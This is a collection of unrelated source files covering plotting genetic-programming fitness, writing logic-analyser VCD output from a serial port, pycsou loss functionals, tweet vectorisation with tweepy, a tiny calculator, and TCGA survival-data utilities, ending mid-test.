def tick_function(X, interval):
return interval * np.array(range(len(X)))
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
ax2.set_xticklabels(tick_function(new_tick_locations, interval))
ax2.set_xlabel("Iteration")
fig.suptitle('Evolution of a ' + title)
fig.tight_layout(rect=[0, 0.03, 1, 0.95])
plt.savefig(f'figures/joint-{save}.pdf')
#plt.show()
def plot_fitness_iter(i, f, title, save):
fig = plt.figure()
plt.plot(i, f, '-o', color='green')
plt.xlabel('Iteration')
plt.title('Fitness per iteration for a ' + title)
plt.savefig(f'figures/iter-{save}.pdf')
#plt.show()
def main(file, interval, title, save=True):
if save:
save = file
data = pd.read_csv(f'csv/{file}.csv')
#plot_fitness_iter(data[ITER], data[FITNESS], title, save)
#plot_fitness_time(data[TIME], data[FITNESS], title, save)
plot_joint(data[TIME], data[FITNESS], interval, title, save)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--file', '-f', type=str, default='temp',
help="filename (without .csv)")
parser.add_argument('--save', '-s', type=bool, default=True,
help="save?")
parser.add_argument('--title', '-t', type=str, default="GP with maximum 3 HLs",
help="figure title")
parser.add_argument('--interval', '-i', type=int, default=2,
help="Interval for joint plotting")
args = parser.parse_args()
main(args.file, args.interval, args.title, args.save)
``` |
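`plot_joint` layers an iteration axis on top of the time axis by reusing every `interval`-th time stamp as a tick position on a twinned axis. A stand-alone sketch of that dual-axis trick with toy data (the data and output file name here are made up):

```python
import numpy as np
import matplotlib.pyplot as plt

ts = np.cumsum(np.random.randint(5, 15, 20))        # toy: seconds per logged iteration
fitness = np.exp(-np.linspace(0, 3, 20))
interval = 2

fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.plot(ts, fitness, '-o', markersize=3)
ax1.set_xlabel('Time (s)')

# second x-axis: tick positions are every `interval`-th time stamp,
# labelled with the iteration number instead of the time value
ax2 = ax1.twiny()
ticks = ts[::interval]
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(ticks)
ax2.set_xticklabels(list(interval * np.arange(len(ticks))))
ax2.set_xlabel('Iteration')

plt.savefig('joint-demo.pdf')
```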
{
"source": "joanrieu/vcd-chainsaw",
"score": 3
} |
#### File: vcd-chainsaw/sender/VcdWriter.py
```python
import serial
import sys
import time
# Open serial port
ser = serial.Serial('/dev/ttyACM0', 2000000)
# Initialize wire states (one entry per wire; -1 means unknown)
wires = [-1 for i in range(2)]
# Open output file (if given)
if len(sys.argv) > 1:
file = open(sys.argv[1], "w")
else:
file = sys.stdout
def wireName(wireId):
"""Computes a VCD wire name (1 char) from a wire number."""
return chr(ord("A") + wireId)
# Write the chosen time unit
file.write("$timescale 1us $end\n")
# Write the VCD name and description of each wire
for wireId in range(len(wires)):
file.write("$var wire 1 %c Digital%d $end\n" % (wireName(wireId), wireId))
# Time reference
startTime = time.time()
# This variable contains the int describing all the wires in one
allWires = -1
while True:
# Read the value of all ports as one integer from the serial port
allWiresOld = allWires
allWires = ord(ser.read()[0])
# Skip this value if all wires are identical
if allWires == allWiresOld:
continue
# Write the header for the new values
# TODO Replace this approximate value with a more precise one
delta = 1e6 * (time.time() - startTime)
file.write("#%d\n" % (delta))
# Write the value of each wire
for wireId in range(len(wires)):
# Extract one wire's state
wire = (allWires & 1 << wireId) >> wireId
# Skip unchanged wires
if wire == wires[wireId]:
continue
# Save the new value
wires[wireId] = wire
# Write it out
file.write("%d%s\n" % (wires[wireId], wireName(wireId)))
``` |
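The sender above streams packed wire states from a serial port and emits them as a Value Change Dump. A hardware-free sketch of the same output format, fed from a canned byte sequence instead of `ser.read()`, so the emitted VCD lines can be inspected directly:

```python
samples = [0b00, 0b01, 0b01, 0b11, 0b10]   # two wires packed into one int per sample
wires = [-1, -1]                           # last known state of each wire

print("$timescale 1us $end")
for wire_id in range(len(wires)):
    print("$var wire 1 %c Digital%d $end" % (chr(ord("A") + wire_id), wire_id))

for t, all_wires in enumerate(samples):
    changed = [(i, (all_wires >> i) & 1) for i in range(len(wires))
               if (all_wires >> i) & 1 != wires[i]]
    if not changed:
        continue
    print("#%d" % t)                       # timestamp header (toy time units)
    for wire_id, value in changed:
        wires[wire_id] = value
        print("%d%c" % (value, chr(ord("A") + wire_id)))
```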
{
"source": "joanrue/pycsou",
"score": 2
} |
#### File: pycsou/func/loss.py
```python
r"""
Repository of common loss functionals.
"""
from pycsou.core.functional import DifferentiableFunctional, ProximableFunctional, ProxFuncPreComp
from pycsou.func.base import IndicatorFunctional
from pycsou.linop.base import DenseLinearOperator
from pycsou.func.penalty import L2Norm, L1Norm, LInftyNorm, L2Ball, L1Ball, LInftyBall, SquaredL1Norm, SquaredL2Norm
from typing import Union
from numbers import Number
import numpy as np
def ProximableLoss(func: ProximableFunctional, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
Constructor of proximable loss functions.
Constructs a proximable loss from a proximable functional and a data vector.
Let :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}` be some proximable functional and :math:`\mathbf{y}\in\mathbb{R}^N`.
This routine defines the loss functional :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Parameters
----------
func: ProximableFunctional
Some proximable functional :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}`.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}\in\mathbb{R}^N`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
Proximable loss functional constructed as :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import ProximableLoss
from pycsou.func.penalty import L1Norm
.. doctest::
>>> y = np.arange(10)
>>> func = L1Norm(dim=y.size)
>>> loss = ProximableLoss(func=func, data=y)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss(x), func(x-y))
True
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The proximity operator of the loss functional is automatically computed from the one of the input functional :math:`\varphi` using
properties described in [ProxAlg]_ Section 2.1.
See Also
--------
:py:func:`~pycsou.func.loss.DifferentiableLoss`.
"""
return ProxFuncPreComp(func, scale=1, shift=-data)
def DifferentiableLoss(func: DifferentiableFunctional, data: Union[Number, np.ndarray]) -> DifferentiableFunctional:
r"""
Constructor of differentiable loss functions.
Constructs a differentiable loss from a differentiable functional and a data vector.
Let :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}` be some differentiable functional and :math:`\mathbf{y}\in\mathbb{R}^N`.
This routine defines the loss functional :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Parameters
----------
func: DifferentiableFunctional
Some differentiable functional :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}`.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}\in\mathbb{R}^N`.
Returns
-------
:py:class:`~pycsou.core.functional.DifferentiableFunctional`
Differentiable loss functional constructed as :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import DifferentiableLoss
from pycsou.func.penalty import SquaredL2Norm
.. doctest::
>>> y = np.arange(10)
>>> func = SquaredL2Norm(dim=y.size)
>>> loss = DifferentiableLoss(func=func, data=y)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss(x), func(x-y))
True
>>> np.allclose(loss.gradient(x), 2*(x-y))
True
Notes
-----
The derivative and Lipschitz constant of the loss functional are automatically computed from those of the input functional :math:`\varphi`.
See Also
--------
:py:func:`~pycsou.func.loss.ProximableLoss`.
"""
return func.shifter(shift=-data)
def L2Loss(dim: int, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
:math:`\ell_2` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|_2`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_2` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L2Loss
from pycsou.func.penalty import L2Norm
.. doctest::
>>> y = np.arange(10)
>>> loss = L2Loss(dim=y.size, data=y)
>>> func = L2Norm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
See Also
--------
:py:func:`~pycsou.func.penalty.L2Norm`, :py:func:`~pycsou.func.loss.L1Loss`, :py:func:`~pycsou.func.loss.LInftyLoss`
"""
L2_norm = L2Norm(dim=dim)
return ProximableLoss(L2_norm, data=data)
def SquaredL2Loss(dim: int, data: Union[Number, np.ndarray]) -> DifferentiableFunctional:
r"""
:math:`\ell^2_2` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|^2_2`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.DifferentiableFunctional`
The :math:`\ell^2_2` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import SquaredL2Loss
from pycsou.func.penalty import SquaredL2Norm
from pycsou.linop.base import DenseLinearOperator
.. doctest::
>>> y = np.arange(10)
>>> loss = SquaredL2Loss(dim=y.size, data=y)
>>> Gmat = np.arange(100).reshape(10, 10).astype(float)
>>> G = DenseLinearOperator(Gmat, is_symmetric=False)
>>> G.compute_lipschitz_cst()
>>> fwd_loss = loss * G
>>> x = 2 * np.arange(10)
>>> np.allclose(loss(x), np.linalg.norm(y - x) ** 2)
True
>>> np.allclose(fwd_loss(x), loss(G(x)))
True
>>> np.allclose(fwd_loss.diff_lipschitz_cst, 2 * (G.lipschitz_cst ** 2))
True
>>> np.allclose(fwd_loss.gradient(x), 2 * G.adjoint(G(x) - y))
True
Notes
-----
The :math:`\ell_2^2` functional is, up to constants, the negative log-likelihood of the data :math:`\mathbf{y}` under the assumption of
Gaussian white noise.
See Also
--------
:py:func:`~pycsou.func.penalty.SquaredL2Norm`, :py:func:`~pycsou.func.loss.L2Loss`.
"""
squared_L2_norm = SquaredL2Norm(dim=dim)
return DifferentiableLoss(squared_L2_norm, data=data)
def L2BallLoss(dim: int, data: Union[Number, np.ndarray], radius: Number = 1) -> ProximableFunctional:
r"""
:math:`\ell_2`-ball loss functional, :math:`\{\mathbf{x}\in\mathbb{R}^N: \|\mathbf{y}-\mathbf{x}\|_2\leq \text{radius}\}`.
The :math:`\ell_2`-ball loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\|\mathbf{x}-\mathbf{y}\|_2\leq \text{radius},\\
+\infty \,\text{otherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
radius: Number
Radius of the ball.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_2`-ball loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L2BallLoss
from pycsou.func.penalty import L2Ball
.. doctest::
>>> y = np.arange(10)
>>> loss = L2BallLoss(dim=y.size, data=y, radius=2)
>>> func = L2Ball(dim=y.size, radius=2)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_2`-ball loss functional is particularly useful in the context of Gaussian white noise with
known standard deviation. In which case, the :math:`\ell_2`-ball defines a confidence region for the data :math:`\mathbf{y}` ([FuncSphere]_ Section 5 of Chapter 7).
See Also
--------
:py:func:`~pycsou.func.penalty.L2Ball`, :py:func:`~pycsou.func.loss.L2Loss`.
"""
L2_ball = L2Ball(dim=dim, radius=radius)
return ProximableLoss(L2_ball, data=data)
def L1Loss(dim: int, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
:math:`\ell_1` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|_1`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_1` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L1Loss
from pycsou.func.penalty import L1Norm
.. doctest::
>>> y = np.arange(10)
>>> loss = L1Loss(dim=y.size, data=y)
>>> func = L1Norm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_1` loss functional leads to sparse residuals, with most of the predicted samples matching exactly the
observed samples, and a few –potentially large– misfits ([FuncSphere]_ Section 5 of Chapter 7).
Such a functional is particularly useful in the context of salt-and-pepper noise with strong outliers, or more generally
for noise distributions with heavy tails, as typified by the Laplace distribution.
See Also
--------
:py:func:`~pycsou.func.penalty.L1Norm`, :py:func:`~pycsou.func.loss.SquaredL1Loss`.
"""
L1_norm = L1Norm(dim=dim)
return ProximableLoss(L1_norm, data=data)
def SquaredL1Loss(dim: int, data: Union[Number, np.ndarray], prox_computation='sort') -> ProximableFunctional:
r"""
:math:`\ell^2_1` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|^2_1`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell^2_1` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import SquaredL1Loss
from pycsou.func.penalty import SquaredL1Norm
.. doctest::
>>> y = np.arange(10)
>>> loss = SquaredL1Loss(dim=y.size, data=y)
>>> func = SquaredL1Norm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
See Also
--------
:py:func:`~pycsou.func.penalty.SquaredL1Norm`, :py:func:`~pycsou.func.loss.L1Loss`.
"""
squared_L1_norm = SquaredL1Norm(dim=dim, prox_computation=prox_computation)
return ProximableLoss(squared_L1_norm, data=data)
def L1BallLoss(dim: int, data: Union[Number, np.ndarray], radius: Number = 1) -> ProximableFunctional:
r"""
:math:`\ell_1`-ball loss functional, :math:`\{\mathbf{x}\in\mathbb{R}^N: \|\mathbf{y}-\mathbf{x}\|_1\leq \text{radius}\}`.
The :math:`\ell_1`-ball loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\|\mathbf{x}-\mathbf{y}\|_1\leq \text{radius},\\
+\infty \,\text{otherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
radius: Number
Radius of the ball.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_1`-ball loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L1BallLoss
from pycsou.func.penalty import L1Ball
.. doctest::
>>> y = np.arange(10)
>>> loss = L1BallLoss(dim=y.size, data=y, radius=2)
>>> func = L1Ball(dim=y.size, radius=2)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_1`-ball loss functional is particularly useful in the context of salt-and-pepper noise with
known standard deviation. In which case, the :math:`\ell_1`-ball defines a confidence region for the data :math:`\mathbf{y}`.
See Also
--------
:py:func:`~pycsou.func.penalty.L1Ball`, :py:func:`~pycsou.func.loss.L1Loss`, :py:func:`~pycsou.func.loss.SquaredL1Loss`.
"""
L1_ball = L1Ball(dim=dim, radius=radius)
return ProximableLoss(L1_ball, data=data)
def LInftyLoss(dim: int, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
:math:`\ell_\infty` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|_\infty`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_\infty` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import LInftyLoss
from pycsou.func.penalty import LInftyNorm
.. doctest::
>>> y = np.arange(10)
>>> loss = LInftyLoss(dim=y.size, data=y)
>>> func = LInftyNorm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> loss(x)
9
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_\infty` loss functional is particularly useful in the context of quantisation noise, or more generally
for noise distributions with compact support.
See Also
--------
:py:func:`~pycsou.func.penalty.LInftyNorm`, :py:func:`~pycsou.func.loss.LInftyBallLoss`.
"""
LInfty_norm = LInftyNorm(dim=dim)
return ProximableLoss(LInfty_norm, data=data)
def LInftyBallLoss(dim: int, data: Union[Number, np.ndarray], radius: Number = 1) -> ProximableFunctional:
r"""
:math:`\ell_\infty`-ball loss functional, :math:`\{\mathbf{x}\in\mathbb{R}^N: \|\mathbf{y}-\mathbf{x}\|_\infty\leq \text{radius}\}`.
The :math:`\ell_\infty`-ball loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\|\mathbf{x}-\mathbf{y}\|_\infty\leq \text{radius},\\
+\infty \,\text{otherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
radius: Number
Radius of the ball.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_\infty`-ball loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import LInftyBallLoss
from pycsou.func.penalty import LInftyBall
.. doctest::
>>> y = np.arange(10)
>>> loss = LInftyBallLoss(dim=y.size, data=y, radius=2)
>>> func = LInftyBall(dim=y.size, radius=2)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_\infty`-ball loss functional is particularly useful in the context of quantisation noise with
compact support. In which case, the :math:`\ell_\infty`-ball defines a confidence region for the data :math:`\mathbf{y}`.
See Also
--------
:py:func:`~pycsou.func.penalty.LInftyBall`, :py:func:`~pycsou.func.loss.LInftyLoss`, :py:func:`~pycsou.func.penalty.LInftyNorm`.
"""
LInfty_ball = LInftyBall(dim=dim, radius=radius)
return ProximableLoss(LInfty_ball, data=data)
def ConsistencyLoss(dim: int, data: Union[Number, np.ndarray]):
r"""
Consistency loss functional :math:`\mathbf{y}=\mathbf{x}`.
The consistency loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\mathbf{x}=\mathbf{y},\\
+\infty \,\text{otherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}` to match.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The consistency loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import ConsistencyLoss
.. doctest::
>>> y = np.arange(10)
>>> loss = ConsistencyLoss(dim=y.size, data=y)
>>> x = 2 * np.arange(10)
>>> loss(x), loss(y)
(inf, 0)
>>> np.allclose(loss.prox(x, tau=1), y)
True
Notes
-----
This functional enforces an exact match between the predicted and observed samples, as required in interpolation problems.
Such a functional is mainly useful in the context of noiseless data as it can lead to serious overfitting issues in the presence of noise.
"""
condition_func = lambda x: np.allclose(x, data)
projection_func = lambda x: data
return IndicatorFunctional(dim=dim, condition_func=condition_func, projection_func=projection_func)
class KLDivergence(ProximableFunctional):
r"""
Generalised Kullback-Leibler divergence :math:`D_{KL}(\mathbf{y}||\mathbf{x}):=\sum_{i=1}^N y_i\log(y_i/x_i) -y_i +x_i`.
The generalised Kullback-Leibler divergence is defined as:
.. math::
D_{KL}(\mathbf{y}||\mathbf{x}):=\sum_{i=1}^N H(y_i,x_i) -y_i +x_i, \quad \forall \mathbf{y}, \mathbf{x} \in \mathbb{R}^N,
where
.. math::
H(y,x):=\begin{cases}
y\log(y/x) &\, \text{if} \,x>0, y>0,\\
0&\, \text{if} \,x=0, y\geq 0,\\
+\infty &\,\text{otherwise.}
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}` to match.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The KL-divergence.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import KLDivergence
.. doctest::
>>> y = np.arange(10)
>>> loss = KLDivergence(dim=y.size, data=y)
>>> x = 2 * np.arange(10)
>>> loss(x)
13.80837687480246
>>> np.round(loss.prox(x, tau=1))
array([ 0., 2., 4., 6., 8., 10., 12., 14., 16., 18.])
Notes
-----
In information theory, and in the case where :math:`\mathbf{y}` and :math:`\mathbf{x}` sum to one (and hence can be interpreted as discrete probability distributions),
the KL-divergence can be interpreted as the relative entropy of :math:`\mathbf{y}` w.r.t. :math:`\mathbf{x}`,
i.e. the amount of information lost when using :math:`\mathbf{x}` to approximate :math:`\mathbf{y}`.
It is particularly useful in the context of count data with Poisson distribution. Indeed, the KL-divergence corresponds
(up to an additive constant) to the negative log-likelihood of the data :math:`\mathbf{y}` where each component is independent
with Poisson distribution and respective intensities given by the entries of :math:`\mathbf{x}`.
See [FuncSphere]_ Section 5 of Chapter 7 for the computation of its proximal operator.
See Also
--------
:py:class:`~pycsou.func.penalty.ShannonEntropy`, :py:class:`~pycsou.func.penalty.LogBarrier`
"""
def __init__(self, dim: int, data: Union[Number, np.ndarray]):
super(KLDivergence, self).__init__(dim=dim, data=None, is_differentiable=False, is_linear=False)
self.data = data
def __call__(self, x: Union[Number, np.ndarray]) -> Number:
z = 0 * x + np.infty
z[(x > 0) * (self.data > 0)] = self.data[(x > 0) * (self.data > 0)] * np.log(
self.data[(x > 0) * (self.data > 0)] / x[(x > 0) * (self.data > 0)])
z[(x == 0) * (self.data >= 0)] = 0
return np.sum(z - self.data + x)
def prox(self, x: Union[Number, np.ndarray], tau: Number) -> Union[Number, np.ndarray]:
r"""
Proximal operator of the KL-divergence functional (see [FuncSphere]_ Section 5 of Chapter 7).
Parameters
----------
x: Union[Number, np.ndarray]
Input.
tau: Number
Scaling constant.
Returns
-------
Union[Number, np.ndarray]
Proximal point of x.
"""
return (x - tau + np.sqrt((x - tau) ** 2 + 4 * tau * self.data)) / 2
if __name__ == "__main__":
import doctest
doctest.testmod()
``` |
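`ProximableLoss` relies on the shift rule referenced in its Notes ([ProxAlg] Section 2.1): for F(x; y) = phi(x - y), prox of tau*F at x equals y plus the prox of tau*phi at x - y. A numpy-only sanity check of that rule in one dimension, using the l1 norm (whose prox is soft-thresholding) and a brute-force minimisation of the prox objective; nothing here depends on pycsou:

```python
import numpy as np

def prox_l1(v, tau):
    # soft-thresholding: proximity operator of tau * |.|
    return np.sign(v) * np.maximum(np.abs(v) - tau, 0.0)

y, x, tau = 3.0, 7.5, 1.0

# shift rule: prox of |x - y| evaluated via the prox of |.|
via_shift_rule = y + prox_l1(x - y, tau)

# brute-force argmin_u 0.5*(u - x)**2 + tau*|u - y| on a fine grid
grid = np.linspace(-20, 20, 400001)
via_brute_force = grid[np.argmin(0.5 * (grid - x) ** 2 + tau * np.abs(grid - y))]

print(via_shift_rule, via_brute_force)   # both ~6.5
```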
{
"source": "joanRVAllen/twitoff-22",
"score": 3
} |
#### File: twitoff-22/twitoff/twitter.py
```python
from os import getenv
import tweepy # interacts with Twitter
import spacy # vectorizes tweets
from .models import DB, Tweet, User
# connect to Twitter API
TWITTER_API_KEY = getenv('TWITTER_API_KEY')
TWITTER_API_KEY_SECRET = getenv('TWITTER_API_KEY_SECRET')
TWITTER_AUTH = tweepy.OAuthHandler(TWITTER_API_KEY, TWITTER_API_KEY_SECRET)
TWITTER = tweepy.API(TWITTER_AUTH)
# load the trained spaCy language model used to vectorize tweet text
nlp = spacy.load('my_model')
def vectorize_tweet(tweet_text):
return nlp(tweet_text).vector
def add_or_update_user(username):
try:
twitter_user = TWITTER.get_user(username)
# If they exist then update that user, if we get something back
# then instantiate a new user
db_user = (User.query.get(twitter_user.id)) or User(
id=twitter_user.id, name=username)
DB.session.add(db_user)
tweets = twitter_user.timeline(
count=200,
exclude_replies=True,
include_rts=False,
tweet_mode="Extended"
) # list of tweets from 'username'
if tweets:
db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
vectorized_tweet = vectorize_tweet(tweet.full_text)
db_tweet = Tweet(id=tweet.id, text=tweet.full_text,
vect=vectorized_tweet)
db_user.tweets.append(db_tweet)
DB.session.add(db_tweet)
except Exception as e:
print('Error processing {}: {}'.format(username, e))
else:
DB.session.commit()
``` |
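Each stored `Tweet.vect` is simply the spaCy document vector returned by `vectorize_tweet`. As a rough illustration of how such vectors might be compared downstream, here is a toy cosine-similarity snippet on stand-in numpy arrays (no spaCy model or Twitter credentials needed; this comparison step is not part of the file above):

```python
import numpy as np

def cosine_similarity(a, b):
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

vect_a = np.array([0.1, 0.3, 0.5])   # stand-ins for vectorize_tweet(...) output
vect_b = np.array([0.2, 0.1, 0.4])
print(cosine_similarity(vect_a, vect_b))
```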
{
"source": "JoanS4/calculadora",
"score": 4
} |
#### File: calculadora/calculadora/file2.py
```python
def operacionvalores(valor1, valor2, operacion):
    # Apply the requested arithmetic operation to the two values.
    if operacion == "sumar":
        resultat = valor1 + valor2
    elif operacion == "restar":
        resultat = valor1 - valor2
    elif operacion == "multiplicar":
        resultat = valor1 * valor2
    else:
        raise ValueError("unsupported operation: {}".format(operacion))
    return resultat
# Execution
if __name__ == "__main__":
resultat = operacionvalores (1,2, "multiplicar")
print(resultat)
``` |
{
"source": "joan-smith/biomarker-survival",
"score": 3
} |
#### File: biomarker-survival/biomarker_survival/tcga_cdr_utilities.py
```python
import pandas as pd
import numpy as np
import sys
import os
class TCGA_CDR_util:
# Cancer types with OS recommended are excluded for brevity.
# OS is the default.
RECOMMENDED_ENDPOINTS = {
'BRCA': 'PFI', # alternative: DFI
'DLBC': 'PFI', # none rec w/o reservation
'KICH': 'OS', # none rec w/o reservation
'LGG': 'PFI', # alternative: DFI
'PCPG': 'PFI', # not recommended, but largest number of events
'PRAD': 'PFI', # alternative: DFI
'READ': 'PFI', # only recommended
'TGCT': 'PFI', # alternative: DFI
'THCA': 'PFI', # alternative: DFI
'THYM': 'PFI', # alternative: DFI
}
def __init__(self, tcga_cgr_table):
self.tcga_cgr_table_path = tcga_cgr_table
self.df = self.read_table()
def read_table(self):
'''
Pull the table into a dataframe and remove redacted patients.
'''
df = pd.read_excel(self.tcga_cgr_table_path,
sheet_name=0,
header=0,
index_col=1,
na_values=['[Not Applicable]', '[Not Available]'],
engine='openpyxl')
df = df[df['Redaction'].isnull()]
return df
def recommended_endpoint(self, cancer_type):
endpoint = 'OS'
if cancer_type in self.RECOMMENDED_ENDPOINTS:
endpoint = self.RECOMMENDED_ENDPOINTS[cancer_type]
return endpoint
def cancer_types(self):
return self.df['type'].unique()
def cancer_type_data(self, cancer_type, extra_cols=[]):
"""
Given a path to the TCGA-CDR Supplemental Table 1, and a cancer type, produce a pandas dataframe
with the recommended time/censor columns and any extra clinical data explicitly requested.
For all cancer types, cancer_type='*'
"""
result_cols = ['censor', 'time'] + extra_cols
if cancer_type == '*':
all_cancers = pd.DataFrame(columns=['type', 'censor', 'time'] + extra_cols)
for t in self.df['type'].unique():
endpoint = self.recommended_endpoint(t)
cols = ['type', endpoint, endpoint + '.time'] + extra_cols
ctype_df = self.df[self.df['type'] == t][cols]
ctype_df.columns = ['type'] + result_cols
all_cancers = all_cancers.append(ctype_df)
return all_cancers.dropna(how='any', subset=['time', 'censor'])
ctype_df = self.df[self.df['type'] == cancer_type]
endpoint = self.recommended_endpoint(cancer_type)
ctype_df = ctype_df[[endpoint, endpoint + '.time'] + extra_cols]
ctype_df.columns = result_cols
ctype_df = ctype_df.dropna(how='any', subset=['time', 'censor'])
return ctype_df
```
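`recommended_endpoint` only consults the class-level `RECOMMENDED_ENDPOINTS` dictionary, so its fallback behaviour can be checked without the Excel file. A small sketch (the `__new__` construction is just a trick to skip `read_table()`; it assumes the package exports `TCGA_CDR_util`, as the later `main.py` does):

```python
from biomarker_survival import TCGA_CDR_util

util = TCGA_CDR_util.__new__(TCGA_CDR_util)   # bypass __init__ / read_table()
print(util.recommended_endpoint('BRCA'))      # 'PFI' (explicit override)
print(util.recommended_endpoint('LUAD'))      # 'OS'  (default endpoint)
```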
#### File: biomarker-survival/tests/test_analysis.py
```python
import os
import numpy as np
import rpy2
from biomarker_survival import analysis
def test_do_cox_success():
time = [48, 79, 9, 60, 81, 0, 64, 5, 26, 39, 83, 55, 33, 20, 29, 38, 47, 49, 96, 50, 84, 45, 84, 43,
4, 87, 27, 15, 24, 34, 46, 43, 53, 41, 86, 69, 79, 25, 6, 65, 71, 52, 43, 18, 32, 7, 47, 57,
7, 45]
